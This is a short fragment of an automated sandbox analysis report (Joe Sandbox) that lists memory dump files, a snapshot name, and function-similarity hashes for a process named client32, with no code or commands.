                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CriticalSection$Leave$Enter
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2978645861-0
                                                                                                                                    • Opcode ID: 10c14cb9c45534fd9ad9362a8b8fd8fef3d09697d59f75ad4657c47dcd1b45a9
                                                                                                                                    • Instruction ID: 024bf54fe56583fc36b1911af5d7f6a9c338d46169c8d4f8be6289797e831c79
                                                                                                                                    • Opcode Fuzzy Hash: 10c14cb9c45534fd9ad9362a8b8fd8fef3d09697d59f75ad4657c47dcd1b45a9
                                                                                                                                    • Instruction Fuzzy Hash: 52018835E0113C6BEB00DBE9ED4D5ADB7A9EB04B9AB4001A6FD18D3A04E631AD0087E1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%